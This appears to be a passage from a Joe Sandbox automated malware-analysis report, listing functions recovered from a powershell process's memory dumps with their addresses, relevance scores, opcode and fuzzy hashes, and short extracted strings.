Instruction Fuzzy Hash: 96C10570E15218CFEB94CF69D885BADBBF2FB8A314F1480AAD508AB251DB7459C4CF41

Function 0694B15B Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2541973748.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6940000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 970271ce19cf84281e40706dccb4ddeb6f53faaa7e117cddaece5784e54658b3
Instruction ID: a45757c8d8270fbbbad88a9d9f04dec2db6c788a5c7235e8a304b88b1c4a7ab8
Opcode Fuzzy Hash: 970271ce19cf84281e40706dccb4ddeb6f53faaa7e117cddaece5784e54658b3
Instruction Fuzzy Hash: CEC12A70A04208CFDB94DFA8D885BAEBBF2FB49305F149069E909A7659DF346D85CF40

Function 06710040 Relevance: .3, Instructions: 273COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2540854855.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6710000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7429996996d36593df67998dca633daa331b5c922459afff62a44d088d1fb674
Instruction ID: 46950d238fbe6539fe2fe50fb046102e329653c9930b855f40b8f1eaf6b76b43
Opcode Fuzzy Hash: 7429996996d36593df67998dca633daa331b5c922459afff62a44d088d1fb674
Instruction Fuzzy Hash: A4C1F470E15218CFEBA4CF69D985BADBBF2BB89304F1090AAD50DAB251DB7459C4CF40

Function 0671056D Relevance: .2, Instructions: 248COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2540854855.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6710000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c1c69338c91d6906f99a5ea6e5324838eb6c9a7f373df42f79f1c42d5c792f0
Instruction ID: 233c1f2e30eb60c65cc394b0b34ba8f4ec21da11b64271e9e269744096c7b3e1
Opcode Fuzzy Hash: 9c1c69338c91d6906f99a5ea6e5324838eb6c9a7f373df42f79f1c42d5c792f0
Instruction Fuzzy Hash: 89B1E574E05218CFEB94CF69D984BADBBF2FB49304F1090AAD409AB251DB749AC4CF41

Function 06710319 Relevance: .2, Instructions: 245COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2540854855.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6710000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd16f3d563d21dc58b23813ebc3e4de3d58ea17b36649726248e71fb33677dce
Instruction ID: 03141b8d7b88b7f531becf9af24324bf3af5198a10e3ddb78ac4568a1735ba4e
Opcode Fuzzy Hash: fd16f3d563d21dc58b23813ebc3e4de3d58ea17b36649726248e71fb33677dce
Instruction Fuzzy Hash: E5B1F574E15218CFEBA4CF69D884BADBBF2FB49304F1090AAD509AB251DB745AC4CF41

Function 067103B8 Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2540854855.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6710000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76f13d01cc825d02617d3db648771c50dfcc117f4d2d42e22aba147448106b1f
Instruction ID: 310ad99f3d45600c7ca447974238fdac465656c0116ed8b7568b682d52358ec0
Opcode Fuzzy Hash: 76f13d01cc825d02617d3db648771c50dfcc117f4d2d42e22aba147448106b1f
Instruction Fuzzy Hash: A4B1F774E15218CFEB94CF69D884BADBBF2FB45304F1090AAE509AB251DB746AC4CF41

Function 06704170 Relevance: .2, Instructions: 213COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2540758559.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6700000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d1fec15cc4e59ff6cb6792d08e1770311c95b06bf5d57739463883ec14193e6
Instruction ID: d8c9984e131444037e54ccc1ea57dce70a86cc0827c4ee30d40941a623db97d2
Opcode Fuzzy Hash: 0d1fec15cc4e59ff6cb6792d08e1770311c95b06bf5d57739463883ec14193e6
Instruction Fuzzy Hash: 098103B0D01209CFEB54CFE9C9447EEBBF1EB49314F10912AD619B7284E7784A55CBA4

Function 06720DA8 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2540951080.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6720000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8a7de42ef8a6dd80bc2d32ab356f844f3b26c165d06b607d0ba6ff91ad14cc9
Instruction ID: 4ebbc311ad1fcf1d9775d08b9091624ec29a36019d436318e44d8a77d373258f
Opcode Fuzzy Hash: f8a7de42ef8a6dd80bc2d32ab356f844f3b26c165d06b607d0ba6ff91ad14cc9
Instruction Fuzzy Hash: E55186B0D06218CFEB90DFA8D448BEEBBB2FF49314F149029D409A7250DB746985CFA4

Function 06720DB8 Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2540951080.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6720000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfa2e5c9a5c1b6bcb6f893dcb3f0e26164be691ec173a7bb2be778bfea3ed204
Instruction ID: cc69b4df55fa3780ecf9b2d97fb9a017348eff96daf9e405d77b644327b33fb2
Opcode Fuzzy Hash: bfa2e5c9a5c1b6bcb6f893dcb3f0e26164be691ec173a7bb2be778bfea3ed204
Instruction Fuzzy Hash: 3B4165B0D06218CFEB90DFA8D448BEEBBB2FF49314F149029D409A7250DB746985CFA4

Function 0670EB18 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2540758559.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6700000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc052e8ef78590b7584063950afb3350ca91e894966e590eefd23bc3dea4fbe7
Instruction ID: 507089fa2e13c3ae7378f5cf6e9023e4b04b11ec4cffa912bfdcb5bd1f0425bd
Opcode Fuzzy Hash: fc052e8ef78590b7584063950afb3350ca91e894966e590eefd23bc3dea4fbe7
Instruction Fuzzy Hash: 524157B1E016199BEB08CFABC94059EFBF3BFC8300F14C16AD958AB254EB3459468B54

Function 067110C0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2540854855.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6710000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e45823d009242acac26406236fcc4d5a411b4e141685f4a4dd18fb6659f2a5c8
Instruction ID: 8f40aab4da9de635ddd0786d2c9d7319bf0af3a6be5163c3dee12f4849d07869
Opcode Fuzzy Hash: e45823d009242acac26406236fcc4d5a411b4e141685f4a4dd18fb6659f2a5c8
Instruction Fuzzy Hash: 88414F71E05A588BEB5CCF6B8C4069EFAF7AFC9301F54C1BA851CAA265EB3005428F41

Function 067088EF Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2540758559.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6700000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5afa7ffc4e1d346cdecd7492045b557131749d98595b72b6e33a257aed98c5a6
Instruction ID: 23053f086f88e63a97a70c5d6e80982ebc5c12cf0761d9c59e7e276267013cb6
Opcode Fuzzy Hash: 5afa7ffc4e1d346cdecd7492045b557131749d98595b72b6e33a257aed98c5a6
Instruction Fuzzy Hash: D531F871D157598BEB1ADF2B985069ABBFBAFC5200F04C1FAD408AA256DA300A85CF51

Function 067110B0 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2540854855.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6710000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab3875a1ef62e82f26a22b5c3984206a23f48dac381c0b1222d976beeacc8fb7
Instruction ID: e198bcc90e949d6a7d60d5c02e87a75bb3b2ffb38b10843f53ebc8d8de297f0a
Opcode Fuzzy Hash: ab3875a1ef62e82f26a22b5c3984206a23f48dac381c0b1222d976beeacc8fb7
Instruction Fuzzy Hash: 53313271E01A589BEB5CCF6B9C4429EFAF7AFC9301F54C1BA950CAE258EB3005428F41

Function 06708920 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2540758559.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6700000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e4ce638d6b75b61de845388fc1a4b99ede973691c4e9ab08bf4f57592c398fe
Instruction ID: eaa951bcf812dcaaac5f3ae2504d8e3f39aff4b775c12c4b017c39dfe9d6597b
Opcode Fuzzy Hash: 9e4ce638d6b75b61de845388fc1a4b99ede973691c4e9ab08bf4f57592c398fe
Instruction Fuzzy Hash: 5F31BCB1D15619CBEB5DCF6BDC4069AFAFBAFC8300F04D1BA940CAA255DB700A818F51

Function 06706270 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2540758559.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6700000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0a65262b689ebe31918468b449b2b9bef9670c7779ee2c8bfee53bed21dcb8f
Instruction ID: f770f4bdff13464e61b70052afd37c4bc0aaf244e26f9f9e6c26463ee6e16ddb
Opcode Fuzzy Hash: d0a65262b689ebe31918468b449b2b9bef9670c7779ee2c8bfee53bed21dcb8f
Instruction Fuzzy Hash: 5521D8B1D01628CBEB58CF6BC9506DDFAF7AFCD300F14C0AAD449AA254DB740A95CE90

Function 06FEA84E Relevance: 17.7, Strings: 14, Instructions: 241COMMON

Download Yara Rule

Strings

*S, xrefs: 06FEA8D8
*S, xrefs: 06FEA992
*S, xrefs: 06FEAA90
*S, xrefs: 06FEA880
*S, xrefs: 06FEA988
*S, xrefs: 06FEA9EA
*S, xrefs: 06FEAA9A
*S, xrefs: 06FEA930
*S, xrefs: 06FEA93A
*S, xrefs: 06FEA88A
*S, xrefs: 06FEA8E2
*S, xrefs: 06FEAA38
*S, xrefs: 06FEA9E0
*S, xrefs: 06FEAA42

Memory Dump Source

Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID: *S$*S$*S$*S$*S$*S$*S$*S$*S$*S$*S$*S$*S$*S
API String ID: 0-3544688868
Opcode ID: c5c3edaaa4704bc75c471fd77f2e169c39de46da20e9fb450fa6cce8604b7d8c
Instruction ID: 949262d1dd1083c88f368dbefc1314d71eb70eb876322bafbd34f15b105a25f3
Opcode Fuzzy Hash: c5c3edaaa4704bc75c471fd77f2e169c39de46da20e9fb450fa6cce8604b7d8c
Instruction Fuzzy Hash: B081E534A093858FD7668B248C64B16BFB2AF82315F1DC5DBD0858F1E7DB768882C752

Function 06FEC9D0 Relevance: 15.5, Strings: 12, Instructions: 470COMMON

Download Yara Rule

Strings

XRcq, xrefs: 06FECDE0
4'^q, xrefs: 06FECC90
tP^q, xrefs: 06FECA9F
LYS, xrefs: 06FECAF6
(ztq, xrefs: 06FECF24
XRcq, xrefs: 06FECED5
LYS, xrefs: 06FECB04
tP^q, xrefs: 06FECAAB
XRcq, xrefs: 06FECEE5
4'^q, xrefs: 06FECA49
4'^q, xrefs: 06FECA55
4'^q, xrefs: 06FECC84

Memory Dump Source

Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID: (ztq$4'^q$4'^q$4'^q$4'^q$LYS$LYS$XRcq$XRcq$XRcq$tP^q$tP^q
API String ID: 0-2112647005
Opcode ID: 32e687d99bcfebd9c31ec87e9e89ad4f44a0f3490a7a15270013563e09a6a320
Instruction ID: c5ab2ccdf578d576dc7e7f73125fbd697b705e47378665dfe08e8aa0903d34fa
Opcode Fuzzy Hash: 32e687d99bcfebd9c31ec87e9e89ad4f44a0f3490a7a15270013563e09a6a320
Instruction Fuzzy Hash: CBF1F432F00248DFDF64CF68C8157AABFE2AF88711F14846AF9259B290DB31D955C7A1

Function 06FEAAB6 Relevance: 15.2, Strings: 12, Instructions: 238COMMON

Download Yara Rule

Strings

*S, xrefs: 06FEACAA
*S, xrefs: 06FEAC52
*S, xrefs: 06FEAB40
*S, xrefs: 06FEABFA
*S, xrefs: 06FEACA0
*S, xrefs: 06FEAAE8
*S, xrefs: 06FEAB4A
*S, xrefs: 06FEAC48
*S, xrefs: 06FEAB98
*S, xrefs: 06FEAAF2
*S, xrefs: 06FEABF0
*S, xrefs: 06FEABA2

Memory Dump Source

Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID: *S$*S$*S$*S$*S$*S$*S$*S$*S$*S$*S$*S
API String ID: 0-4240606404
Opcode ID: dcc6ddc8bf0caa470c95a229567d60ff67e783d4f727a29aba07f431c7cc71a1
Instruction ID: 84efa1361ff88047666efa7c7505b40255c44fc03a29984038da1be0fa5d96fc
Opcode Fuzzy Hash: dcc6ddc8bf0caa470c95a229567d60ff67e783d4f727a29aba07f431c7cc71a1
Instruction Fuzzy Hash: 1581A334A0A3858FD7668B2888647137FB2AF82214F1DC5D7D495CF1A3DA7ACC86C752

Function 06FEBC21 Relevance: 13.9, Strings: 11, Instructions: 195COMMON

Download Yara Rule

Strings

TQcq, xrefs: 06FEBC5D
TQcq, xrefs: 06FEBDD1
tP^q, xrefs: 06FEBD15
4'^q, xrefs: 06FEBCC3
4'^q, xrefs: 06FEBDFD
4'^q, xrefs: 06FEBD72
4'^q, xrefs: 06FEBCB7
tP^q, xrefs: 06FEBD09
TQcq, xrefs: 06FEBDC1
4'^q, xrefs: 06FEBDF1
4'^q, xrefs: 06FEBD82

Memory Dump Source

Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$TQcq$TQcq$TQcq$tP^q$tP^q
API String ID: 0-3054499449
Opcode ID: 186c0a02190030224692e59cb2d67008b5b7d87e4c57a3df4827161e718eed17
Instruction ID: d85afe412d5868aac364d060df2b211bd248881601e867a99be3f00e42fd11ae
Opcode Fuzzy Hash: 186c0a02190030224692e59cb2d67008b5b7d87e4c57a3df4827161e718eed17
Instruction Fuzzy Hash: C161C335F04218DFDB698F58C6557AABFA2BF88311F2488AAD9015F294CB31DC45CBA1

Function 06FECFE8 Relevance: 9.1, Strings: 7, Instructions: 382COMMON

Download Yara Rule

Strings

$^q, xrefs: 06FED173
P`S, xrefs: 06FED225
$^q, xrefs: 06FED14B
4'^q, xrefs: 06FED19B
$^q, xrefs: 06FED167
4'^q, xrefs: 06FED18F
P`S, xrefs: 06FED217

Memory Dump Source

Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$P`S$P`S$$^q$$^q$$^q
API String ID: 0-332042998
Opcode ID: 1b6a6db859a01849f5dfa9b908673301be3953849c7f6090a4882c67509a757e
Instruction ID: 7a6bbb50b714f674eeb38b91d50055f8fdd19585b2b07f89f133d8c63a5b2db3
Opcode Fuzzy Hash: 1b6a6db859a01849f5dfa9b908673301be3953849c7f6090a4882c67509a757e
Instruction Fuzzy Hash: D5C14432F042148FEB548B68D8047ABBFE2AFD5321B18847BD549CB651EB36D846C7E1

Function 068EC540 Relevance: 7.8, Strings: 6, Instructions: 279COMMON

Download Yara Rule

Strings

Lxr, xrefs: 068EC7FB
sr, xrefs: 068EC61E
Lxr, xrefs: 068EC80B
4'^q, xrefs: 068EC8BF
sr, xrefs: 068EC62E
4'^q, xrefs: 068EC8CF

Memory Dump Source

Source File: 00000004.00000002.2541532402.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_68e0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$Lxr$Lxr$sr$sr
API String ID: 0-2655784753
Opcode ID: 514f57b660c5751bf2494066ab12adcd89ffaf6ff9885f91354585ae774b8261
Instruction ID: 18b36bbc386e6f376228f1fd4de7a53de8fe68e8338bb3b9f184e582f9d1abc4
Opcode Fuzzy Hash: 514f57b660c5751bf2494066ab12adcd89ffaf6ff9885f91354585ae774b8261
Instruction Fuzzy Hash: B9C12870D0421CCFDF58DFA9D9456AEBBB2FF8A301F109029D526AB250CB385982CF90

Function 06FE0284 Relevance: 7.6, Strings: 6, Instructions: 79COMMON

Download Yara Rule

Strings

$^q, xrefs: 06FE035E
4'^q, xrefs: 06FE037F
4'^q, xrefs: 06FE02F7
4'^q, xrefs: 06FE0373
$^q, xrefs: 06FE0352
4'^q, xrefs: 06FE02EB

Memory Dump Source

Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q
API String ID: 0-1041444323
Opcode ID: 2d372115de6ee5fe66db88f7d10c86fbb71903a40249d81f395850d1b1c407bc
Instruction ID: 327be67996ef572e4e9aceaeff0e665410e4eb4b1caccc2ad593eb64f675176e
Opcode Fuzzy Hash: 2d372115de6ee5fe66db88f7d10c86fbb71903a40249d81f395850d1b1c407bc
Instruction Fuzzy Hash: E5216D21F093554FCB6A153C18216656FE35FD665133944ABC481DF28ACFA18C5A83E2

Function 06FE0D08 Relevance: 6.6, Strings: 5, Instructions: 326COMMON

Download Yara Rule

Strings

$^q, xrefs: 06FE0D49
$^q, xrefs: 06FE0D3B
$^q, xrefs: 06FE0D1A
4'^q, xrefs: 06FE0ED1
4'^q, xrefs: 06FE0EDD

Memory Dump Source

Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q
API String ID: 0-3272787073
Opcode ID: 1bc7c6bd154b363f9741fc5707af763359e9ab8e3e63a940de7ad4ff1c62422f
Instruction ID: 08d1f1ab4a62939d495eaaf446e8e8da16cb3f68b14db77276ec4d93fe7c0ede
Opcode Fuzzy Hash: 1bc7c6bd154b363f9741fc5707af763359e9ab8e3e63a940de7ad4ff1c62422f
Instruction Fuzzy Hash: EDA14636F043558FDB648B68881066ABFE2EFD5221B14C47BD905CB241EF72D866C7A1

Function 0671C758 Relevance: 6.4, Strings: 5, Instructions: 167COMMON

Download Yara Rule

Strings

(br, xrefs: 0671C815
(br, xrefs: 0671C8CE
(br, xrefs: 0671C809
(br, xrefs: 0671C863
(br, xrefs: 0671C86F

Memory Dump Source

Source File: 00000004.00000002.2540854855.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6710000_powershell.jbxd

Similarity

API ID:
String ID: (br$(br$(br$(br$(br
API String ID: 0-256022935
Opcode ID: 699ce88e97bcd6d8dc627d563fd8e76cbd897a21b89bcea9fb8c0735804bccd9
Instruction ID: e57ab9d86e7435e6efcafa39880c0321c41cd83a9bb40b963a07e7a534b125b3
Opcode Fuzzy Hash: 699ce88e97bcd6d8dc627d563fd8e76cbd897a21b89bcea9fb8c0735804bccd9
Instruction Fuzzy Hash: C751BE30B40215DFD751CBADD894A6ABBF2FB85320F14C52BE9099B351CB78E842CB90

Function 06FE5CA9 Relevance: 6.4, Strings: 5, Instructions: 138COMMON

Download Yara Rule

Strings

$^q, xrefs: 06FE5E3C
$^q, xrefs: 06FE5DB0
$^q, xrefs: 06FE5D6E
$^q, xrefs: 06FE5DD7
4'^q, xrefs: 06FE5E8A

Memory Dump Source

Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$$^q$$^q$$^q$$^q
API String ID: 0-2825857601
Opcode ID: 3a8a01005d9197abdc51ce76f9536784c318874635e525b7c59623f4ea889eb6
Instruction ID: 17e4d04a71a0107910393e089500c43e647a6c06e6cce375bf376e226a1fc42a
Opcode Fuzzy Hash: 3a8a01005d9197abdc51ce76f9536784c318874635e525b7c59623f4ea889eb6
Instruction Fuzzy Hash: F851BE35E04209DFDFB58F14C5487AA7FB2BF41219F5880A6E8059F1A0D736CD85CBA1

Function 06FE4D08 Relevance: 6.4, Strings: 5, Instructions: 108COMMON

Download Yara Rule

Strings

$^q, xrefs: 06FE4DCF
$^q, xrefs: 06FE4DAE
4'^q, xrefs: 06FE4E8A
$^q, xrefs: 06FE4DF6
$^q, xrefs: 06FE4E5B

Memory Dump Source

Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$$^q$$^q$$^q$$^q
API String ID: 0-2825857601
Opcode ID: b4f16bfb27ac3dc87b671f6e1bcebc2bf91f152cf9ce6683fd94f7e219e36872
Instruction ID: ae9a695999bafb7b4c1fb28207dffcbc1f48389dd4db67ae2bfe7550aad6fd4c
Opcode Fuzzy Hash: b4f16bfb27ac3dc87b671f6e1bcebc2bf91f152cf9ce6683fd94f7e219e36872
Instruction Fuzzy Hash: 08418735E00609DFEBA8CF18C448BA97BF2BB40751F18806EE4198F6A0C774D984CB91

Function 06FE9F58 Relevance: 6.4, Strings: 5, Instructions: 106COMMON

Download Yara Rule

Strings

$^q, xrefs: 06FEA036
$^q, xrefs: 06FEA014
$^q, xrefs: 06FEA084
4'^q, xrefs: 06FEA0C6
$^q, xrefs: 06FE9FF8

Memory Dump Source

Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$$^q$$^q$$^q$$^q
API String ID: 0-2825857601
Opcode ID: 3837c761ca1ee0fadfa4e714c7d38bdfe075074bff30f72e69c67035fd962ed6
Instruction ID: 239f60d975e123f3e879aeba50515debb964839f50d3669d65f94aaa5b9628ab
Opcode Fuzzy Hash: 3837c761ca1ee0fadfa4e714c7d38bdfe075074bff30f72e69c67035fd962ed6
Instruction Fuzzy Hash: 8031B231E00208DFEFB48F64C544B7A7FF6AF80250F15806AE6058B255DB79D988CBA1

Function 06FE7D28 Relevance: 6.3, Strings: 5, Instructions: 93COMMON

Download Yara Rule

Strings

$^q, xrefs: 06FE7D9B
4'^q, xrefs: 06FE7E63
$^q, xrefs: 06FE7E3B
$^q, xrefs: 06FE7DBC
$^q, xrefs: 06FE7DE6

Memory Dump Source

Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$$^q$$^q$$^q$$^q
API String ID: 0-2825857601
Opcode ID: 6988293ea549fd9203bfac1bc54c8fd7673cb1039268e01c77b4adb4e25085a8
Instruction ID: 99e31e9dcfd883f05f9b279823c02e388e0382bf964f3e431cf1951d62281ac6
Opcode Fuzzy Hash: 6988293ea549fd9203bfac1bc54c8fd7673cb1039268e01c77b4adb4e25085a8
Instruction Fuzzy Hash: F131AB3AE04709DFEFB4AE25C544BBABFF6AF44610F18856AD9048B240D731DD44CBA1

Function 06FE6970 Relevance: 5.3, Strings: 4, Instructions: 308COMMON

Download Yara Rule

Strings

tP^q, xrefs: 06FE6A07
4'^q, xrefs: 06FE6D22
4'^q, xrefs: 06FE6D16
tP^q, xrefs: 06FE6A13

Memory Dump Source

Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$tP^q$tP^q
API String ID: 0-3859475322
Opcode ID: 094cf651185cc10a14289a4bd81107574f7de233180c775b03c9515b95957f2a
Instruction ID: eccee8784d8792b07e89fddbb9f0c0c71a41813d46dea0589de071b9a6bc0dfc
Opcode Fuzzy Hash: 094cf651185cc10a14289a4bd81107574f7de233180c775b03c9515b95957f2a
Instruction Fuzzy Hash: F3A12531F142188FDBA49F68C80476ABFE2AFE9711B24C46AE905DF281DB31D845C7E1

Function 068E43EF Relevance: 5.3, Strings: 4, Instructions: 279COMMON

Download Yara Rule

Strings

4'^q, xrefs: 068E4661
4'^q, xrefs: 068E464B
4'^q, xrefs: 068E45A7
4'^q, xrefs: 068E45BD

Memory Dump Source

Source File: 00000004.00000002.2541532402.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_68e0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q
API String ID: 0-1420252700
Opcode ID: 058948824d2d9a1b469eae8f993ac68f17e0527f0e97359b2defad85c5fa47a5
Instruction ID: 579d38882743aa13916c83b070149cfc0aefca15d39af2c595064c6d1656eba8
Opcode Fuzzy Hash: 058948824d2d9a1b469eae8f993ac68f17e0527f0e97359b2defad85c5fa47a5
Instruction Fuzzy Hash: 5CC16FB4B002189FDB54DB54C894B99BBB2AF85304F50C1D4D649AB385CF71EE86CF91

Function 06FE5230 Relevance: 5.1, Strings: 4, Instructions: 117COMMON

Download Yara Rule

Strings

(o^q, xrefs: 06FE527F
tP^q, xrefs: 06FE53B7
$^q, xrefs: 06FE5334
(o^q, xrefs: 06FE5273

Memory Dump Source

Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$tP^q$$^q
API String ID: 0-1137240099
Opcode ID: dcd89cd87a643402295cfe3c6ce8e790eaf78e54236ebd23cdd1414208f34c56
Instruction ID: e65af476b5739547c3c4d0f82fb698dc5334e9f068325e66206f165dde0370d8
Opcode Fuzzy Hash: dcd89cd87a643402295cfe3c6ce8e790eaf78e54236ebd23cdd1414208f34c56
Instruction Fuzzy Hash: 1F415B31E052049FDB648FA8C845A6ABFE2BF85314F1484AAD814EF291C772DC08C7A1

Function 06FE3250 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$^q, xrefs: 06FE327E
$^q, xrefs: 06FE32B8
$^q, xrefs: 06FE32AC
$^q, xrefs: 06FE3262

Memory Dump Source

Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
